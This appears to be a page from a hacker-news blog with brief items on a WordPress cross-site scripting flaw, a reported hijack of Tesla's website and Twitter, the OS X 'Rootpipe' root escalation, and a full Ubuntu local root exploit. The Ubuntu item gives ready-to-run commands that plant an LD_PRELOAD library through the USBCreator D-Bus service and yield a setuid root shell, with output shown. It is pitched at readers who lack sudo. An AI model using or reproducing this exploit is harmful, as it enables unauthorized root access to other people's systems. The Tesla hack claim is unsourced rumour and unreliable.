illmob

WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen. It allows an attacker to inject code into the HTML content received by administrators who maintain the website. Recommended that you update to WordPress 4.2.1.
::Source::

http://teslamotors.com and their twitter got owned today

whoever had control of the twitter mistakenly posted a screenshot of their skype session

the site is currently down.

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,”foo”,XAUTHORITY,”foo”,LD_PRELOAD,”/tmp/test.so”
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id

::Source::

The Admin framework in Apple OS X contains a hidden backdoor API Privilege Escalation to root privileges. It’s been there for several years (at least since 2011). Metasploit has added the POC module to their repo Mac OS X “Rootpipe” Users who aren’t running “yosemite” are shit out of luck so far, Apple had no plans to fix.
More info:truesecdev.wordpress.com